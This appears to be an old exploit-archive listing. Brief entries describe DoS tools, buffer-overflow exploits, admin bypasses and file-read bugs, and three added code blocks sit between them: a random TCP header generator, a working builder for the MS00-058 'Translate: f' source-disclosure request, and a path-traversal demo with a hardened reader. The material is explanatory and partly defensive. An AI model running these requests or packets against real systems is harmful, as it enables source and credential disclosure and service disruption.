vqServer version 1.4.49 is vulnerable to a denial of service attack by sending a malformed URL request. Tested on the Windows version. The latest release of vqServer (1.9.47) is unaffected.
50488cee02fca807a8ce6e2060e9884bc802b907abd649fbdd372b9c7f8b7fae
Vigilante Advisory #7 - A malicious user can crash an Intel Express 550F, or a host behind it, by sending a packet with a malformed header. To restart the box you need to remove it from its power source, since the reset button stops working as well. Affected systems: Intel Express Switch 550F - Firmware version 2.63 - Firmware version 2.64.
e5543dcadd99ee203a752f663a687366bd68f30736388f7036df6793e11c9e4c
Bubonic.c is a denial of service tool that sends TCP packets with randomized header fields. Tested against Windows 2000 and RedHat Zoot.
2013c97c64a142d7b60cf7fb0c87cfb2051a655e1a6bbacda27c715de28a58c4
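As an added illustration of what "random TCP packets with random settings" means at the wire level (this is not Bubonic's own code, which the page does not reproduce): a 20-byte TCP header with randomized ports, sequence and acknowledgement numbers, flag combinations and window, checksummed over the IPv4 pseudo-header so that a receiving stack parses the segment instead of silently dropping it. The endpoint addresses and the seed are constructed here, and nothing is transmitted; transmitting such segments would need a raw socket and root.

```python
import random
import socket
import struct

# Constructed endpoints for the example; nothing is sent on the wire.
SRC_IP = "10.0.0.1"
DST_IP = "10.0.0.2"


def inet_checksum(data):
    """RFC 1071 one's-complement checksum, as used by IP, TCP and UDP."""
    if len(data) % 2:
        data += b"\x00"
    total = 0
    for i in range(0, len(data), 2):
        total += (data[i] << 8) | data[i + 1]
    while total >> 16:                      # fold carries back in
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def pseudo_header(src_ip, dst_ip, tcp_len):
    """IPv4 pseudo-header that the TCP checksum covers in addition to the segment."""
    return struct.pack("!4s4sBBH", socket.inet_aton(src_ip),
                       socket.inet_aton(dst_ip), 0, socket.IPPROTO_TCP, tcp_len)


def build_random_segment(src_ip, dst_ip, rng):
    """Build one 20-byte TCP header with randomized fields and a valid checksum."""
    sport = rng.randrange(1024, 65536)
    dport = rng.randrange(1, 65536)
    seq = rng.getrandbits(32)
    ack = rng.getrandbits(32)
    flags = rng.getrandbits(6)              # any mix of FIN/SYN/RST/PSH/ACK/URG, sane or not
    window = rng.getrandbits(16)
    urgent = rng.getrandbits(16)
    data_offset = 5 << 4                    # header is 5 32-bit words, no options
    header = struct.pack("!HHIIBBHHH", sport, dport, seq, ack,
                         data_offset, flags, window, 0, urgent)
    csum = inet_checksum(pseudo_header(src_ip, dst_ip, len(header)) + header)
    # Checksum field sits at bytes 16-17 of the header.
    return header[:16] + struct.pack("!H", csum) + header[18:]


def checksum_ok(src_ip, dst_ip, segment):
    """Receiver-side check: summing pseudo-header + segment (checksum included) gives 0."""
    return inet_checksum(pseudo_header(src_ip, dst_ip, len(segment)) + segment) == 0


def decode_flags(segment):
    """Human-readable flag set of a segment, for inspecting what was generated."""
    names = ["FIN", "SYN", "RST", "PSH", "ACK", "URG"]
    bits = segment[13]                      # flags byte follows the data-offset byte
    return [name for i, name in enumerate(names) if bits & (1 << i)]


def make_batch(count, seed):
    """Deterministic batch of random segments (seeded so runs are reproducible)."""
    rng = random.Random(seed)
    return [build_random_segment(SRC_IP, DST_IP, rng) for _ in range(count)]


if __name__ == "__main__":
    for seg in make_batch(5, 2000):
        print(seg.hex(), decode_flags(seg), checksum_ok(SRC_IP, DST_IP, seg))
```

The flags byte is drawn uniformly, so combinations such as SYN+FIN or RST+URG that no conforming stack ever emits appear about as often as legitimate ones; that is what exercised the target stacks' error paths.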
Dameonic.c is a theoretical router-based denial of service attack that exploits a weakness in the Border Gateway Protocol (BGP). If a malicious user sends spoofed, malformed packets to a neighboring router, the peer will ignore them and possibly tear down the session entirely. Written on an Ultra 5 running Linux Zoot; it compiles on Linux, OpenBSD and Solaris without problems.
087027be1ed28b34dfed0504b156c7b5365220433158b9462f5e771cc9c446cd
A short advisory on how to exploit a bug in the PHP-Nuke web portal system to gain administrative access.
cf5caaf8ca30d68549e8b03b403d8357b9091908f9a1f4a699adfa6d79dd6c90
USSR Labs Advisory #51 - A remote denial of service caused by a buffer overflow in the rpc module of Pragma TelnetServer 2000 for Windows NT/2000. The included shellcode causes the system to crash.
80aaff8dc2722ce8975dbf99700af93496577d3c0b91d5b96d636774b89c15f0
Darxite, a daemon that retrieves files via FTP or HTTP, has several vulnerabilities throughout its code that allow a local or remote user to crash the server, as well as a remote overflow in password authentication that gives remote shell access as the uid of the darxite daemon. Exploit and advisory included. Tested against Linux x86 systems.
2c5a17a7af5e62b8c35d708754842d9f6d13efbcd99d19896e60c3d9ca6f3760
Slrnpull.c exploits a local buffer overflow vulnerability in slrnpull version 0.9.6.2, which is setgid news. Tested against RedHat 6.2.
416129da6ec1a149669dbfa4d033e8be06cf479f020fc5eefda50e6ade9d3fc9
A vulnerability in the way PHP-Nuke, a news site administration tool, authenticates administrative accounts allows a remote attacker to gain administrative access to the application. An attacker could edit users, articles, topics and banners, assign authors, etc.
eca37faae9a6a2eeba44799294fae819f847c9d8cb2db5b49509a50b9b29c9ac
Htgrep has a vulnerability which allows a remote user to read arbitrary files on the system with the privileges of the user running the program.
c01230dec2a91deb2f424d3380ac2843757db64552164f3d93bd6365f519b20b
Srcgrab.pl exploits the Translate: f bug described in MS00-058. The vulnerability, present in IIS 4.0 and Windows 2000 FrontPage server extensions, allows a remote user to retrieve the source of .asa and .asp pages.
33424ecc3ff3c935dcbae09202091459045e94a6f7ba54fa540a7133c419705e
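The request that triggers this bug is short enough to show in full. The following is an added example, not srcgrab.pl itself: it builds the raw request and classifies the reply. Two details do the work, and one of them is not stated on this page but is in the public advisory: the requested path carries a trailing backslash, which diverts the request from the ASP engine to the WebDAV/FrontPage code path, and the "Translate: f" header asks that code path for the file as stored rather than a processed view. The sample responses are constructed here, not captured from a real server.

```python
def build_translate_f_request(host, path):
    """Raw HTTP/1.0 request for the MS00-058 'Translate: f' source disclosure.

    The trailing backslash on the path and the 'Translate: f' header are the
    whole trick; everything else is an ordinary GET.
    """
    if not path.startswith("/"):
        raise ValueError("path must be absolute, e.g. /default.asp")
    request = (
        "GET %s\\ HTTP/1.0\r\n"
        "Host: %s\r\n"
        "Translate: f\r\n"
        "\r\n" % (path, host)
    )
    return request.encode("ascii")


def split_response(raw):
    """Split a raw HTTP response into (status_code, headers_dict, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    status = int(lines[0].split()[1])
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return status, headers, body.decode("latin-1")


def looks_like_disclosed_source(body):
    """Rendered ASP output never contains server-side delimiters; a body that
    still has '<%' or a runat="server" block was served verbatim."""
    return "<%" in body or 'runat="server"' in body.lower()


def classify(raw_response):
    """Return 'source' (leak), 'rendered' (page executed normally) or 'error'."""
    status, _, body = split_response(raw_response)
    if status != 200:
        return "error"
    return "source" if looks_like_disclosed_source(body) else "rendered"


# Constructed sample responses (not captured from a real server).
RENDERED = (b"HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n"
            b"<html><body>Hello</body></html>")
LEAKED = (b"HTTP/1.1 200 OK\r\nContent-Type: application/octet-stream\r\n\r\n"
          b"<% Set cn = Server.CreateObject(\"ADODB.Connection\")\r\n"
          b"cn.Open \"DSN=shop;UID=webapp;PWD=secret\" %>\r\n<html>Hello</html>")

if __name__ == "__main__":
    print(build_translate_f_request("www.example.com", "/default.asp").decode())
    print("rendered sample ->", classify(RENDERED))
    print("leaked sample   ->", classify(LEAKED))
```

Against a live host the bytes from build_translate_f_request() go over a plain TCP connection to port 80 and the whole reply is fed to classify(); a 'source' result on a .asa file is the worst case, since global.asa is where connection strings and credentials usually live.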
The ncftp client uses an easily reversed scheme to save passwords for remote FTP sites in its bookmark file. Crackncftp.c recovers the plaintext password from the encoded string.
4ed56e4e5d88cc9b9c62d4ce74ab7b94bc9d98b285cadb58d0da304ceca15a9b
Georgi Guninski security advisory #18 - Two serious vulnerabilities have been found in Microsoft products. Internet Explorer 5.5/5.x may execute arbitrary programs when visiting a web page, reading HTML-based mail with Outlook, or simply browsing folders as web pages. In addition, the default installation of Windows 2000 allows local Administrator compromise via opening local folders as web pages. In both cases a malicious person may take full control of the user's computer or server. Includes proof of concept HTML code. Demonstration available here.
49fd86e3c8396e11f2d62291b0e07c00a9c7b972856156f9dac92627faf60f3b
RapidStream VPN nodes have the 'rsadmin' account hard-coded into the sshd binary of the appliance OS. The account has a null password; password assignment and authentication were expected to be handled by the RapidStream software itself. The vendor did not realize that arbitrary commands could be appended to the ssh command line when connecting to the SSH server on the remote VPN. This can lead to many things, including the ability to spawn a remote root shell on the VPN.
1fd2ed25e75ae6103e367de4a012acaddbd2dec2b82709822d1d1f127d8cc413
Linsql is a simple command-line client for MS SQL Server which can execute arbitrary SQL queries and OS commands on MS SQL hosts that use a blank 'sa' password, a common default configuration.
8c9396b46daebd7ef569ec0f947a5ed309df55823876b48edcb9daffb8a5e521
Vigilante Security Advisory - The OS/2 Warp 4.5 FTP Server contains denial of service vulnerabilities which allow anyone who can connect to port 21 to crash the service. Fix available here.
dcb764dd372fa94bea264f25decd609cbc3da5a3d482b1c028224a0dfc38159b
Vigilante Security Advisory - Watchguard Firebox authentication denial of service vulnerability. Sending a malformed URL to TCP port 4100 causes the Watchguard to shut down and require a reboot to restart. Fix available here.
14919ca4948fe3696698e353b783188ead84c819a08b964e581bbb6c4dfa3cc0
Versions 3 and 4 of the Lyris List Manager allow any mailing list subscriber to gain access to the administrative interface of that list by changing a form before submitting it. Fix available here.
2f0b0f3203076a0c3be1376c0bf6a444c51fef60e897a936f0aedc04872cfb91
Form-Totaller version 1.0 (form-totaller.cgi) trusts user input for filenames, allowing a remote user to read any file on the webserver.
e3d777d52f8cfacde87ec258a2d6cfa48ba8b637c56c21835cdf716ee4620394
The Everything Form (everythingform.cgi) contains remote vulnerabilities which allow any file on the system to be read.
1b339106ce174c1887c0dbb63dc46ef3e2273e5d5d44fae56593ea21e2c22e12
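This entry and the Form-Totaller entry above are the same bug class: a filename taken straight from the submitted form and opened relative to the script's data directory. The following added example (illustrative Python, not the code of either CGI, which the page does not reproduce) puts the trusting pattern beside a checked one and drives both over a throwaway directory tree constructed inside the script, including a symlink escape that a plain string check on the name would miss.

```python
import os
import tempfile


def read_trusting_input(base_dir, user_name):
    """Vulnerable pattern: the path is built directly from the request parameter,
    so '../secret.txt' or '/etc/passwd' reads whatever the web user can open."""
    with open(os.path.join(base_dir, user_name)) as f:
        return f.read()


def resolve_within(base_dir, user_name):
    """Map a user-supplied name onto base_dir, refusing anything that is not a
    plain filename that still resolves to a direct child after symlinks."""
    base = os.path.realpath(base_dir)
    if (not user_name or user_name in (".", "..")
            or user_name != os.path.basename(user_name)):
        raise ValueError("not a plain filename: %r" % user_name)
    target = os.path.realpath(os.path.join(base, user_name))
    if os.path.dirname(target) != base:
        raise ValueError("%r resolves outside %s" % (user_name, base))
    return target


def read_checked(base_dir, user_name):
    """Hardened version of read_trusting_input()."""
    with open(resolve_within(base_dir, user_name)) as f:
        return f.read()


def demo():
    """Build a constructed tree and exercise both readers; returns the outcomes."""
    root = tempfile.mkdtemp()
    data = os.path.join(root, "data")           # what the CGI is meant to serve from
    os.mkdir(data)
    with open(os.path.join(data, "totals.txt"), "w") as f:
        f.write("total=42\n")
    with open(os.path.join(root, "secret.txt"), "w") as f:   # outside data/
        f.write("db_password=hunter2\n")
    # A symlink inside data/ pointing outside: the name itself looks harmless.
    os.symlink(os.path.join(root, "secret.txt"), os.path.join(data, "link.txt"))

    results = {"normal": read_checked(data, "totals.txt")}
    results["trusting_traversal"] = read_trusting_input(data, "../secret.txt")
    results["trusting_symlink"] = read_trusting_input(data, "link.txt")
    for key, name in (("checked_rejects_traversal", "../secret.txt"),
                      ("checked_rejects_absolute", os.path.join(root, "secret.txt")),
                      ("checked_rejects_symlink", "link.txt")):
        try:
            read_checked(data, name)
            results[key] = False
        except ValueError:
            results[key] = True
    return results


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, "->", repr(value))
```

The realpath() comparison is what catches the symlink case; checking only for ".." or "/" in the name passes "link.txt" and still leaks the file.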
The wais.pl CGI written by Tony Sanders provides means to access the waisq WAIS client via the webserver. Waisq contains buffer overflows allowing remote code execution which can be exploited via wais.pl. In addition, files owned by nobody on the webserver can be overwritten with arbitrary content. Includes exploit for Linux/x86.
0a1486af2061c3b2f7952eb470c47fcbf6d3d36571a036f046ae5709356c58d1
Gopher+ v2.3.1p0 remote exploit - Spawns a remote shell on tcp port 36864 under the UID that the gopher+ daemon runs as. Tested against Linux Slackware 3.6 / 7.0.
71aa58978ab9c730cefaa09803a9c98febeb91b69d9d601ac9a232b790ac1e41
Statistics Server 5.02x for Windows contains a buffer overflow caused by a long GET request. Includes perl exploit which spawns a winshell with system privileges on port 8008 on Statistics Server 5.02x/Win2k.
4d5eb9ffd94b406e9662e8575bcca3692763124371afe9b77e28d789f947712f
Redhat Linux rpc.statd remote buffer overflow exploit. Tested against Redhat 6.0, 6.1, and 6.2.
c1de1ba5c571d6f403a8f820e615faa4e5df066142935928a9f9d39804e2b53f
Gopher+ daemon v2.3 remote root buffer overflow exploit - Tested against Slackware Linux 3.6 and 7.0. Adds a line to /etc/passwd.
9c2f2d4a91a62e040ddd61ebd3561c42d0097168294f3951f1f9d91c91fab2e1